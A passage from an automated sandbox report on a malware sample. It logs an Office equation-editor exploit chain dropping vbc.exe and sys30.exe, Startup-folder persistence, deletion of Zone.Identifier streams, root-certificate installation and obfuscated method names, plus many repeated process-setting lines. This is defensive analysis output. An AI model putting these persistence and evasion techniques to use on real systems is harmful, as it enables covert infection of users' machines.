Source: 8.2.sys30.exe.1220000.1.unpack, Ed06/Qd84.csHigh entropy of concatenated method names: '.ctor', 'Kj0m', 'Re73', 't5L2', 'Lq73', 'Hb8r', 'Kz64', 'p8QT', 'q4D3', 'Bn3f'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\sys4h57g\sys30.exeJump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeFile created: C:\Users\user\AppData\Local\Temp\sys30s.exeJump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directoryShow sources
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sys30.lnkJump to behavior
Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sys30.lnkJump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
Source: C:\Users\Public\vbc.exeFile opened: C:\Users\Public\vbc.exe\:Zone.Identifier read attributes | deleteJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeFile opened: C:\Users\user\AppData\Local\sys4h57g\sys30.exe\:Zone.Identifier read attributes | deleteJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeFile opened: C:\Users\user\AppData\Local\sys4h57g\sys30.exe:Zone.Identifier read attributes | delete
Source: C:\Users\Public\vbc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
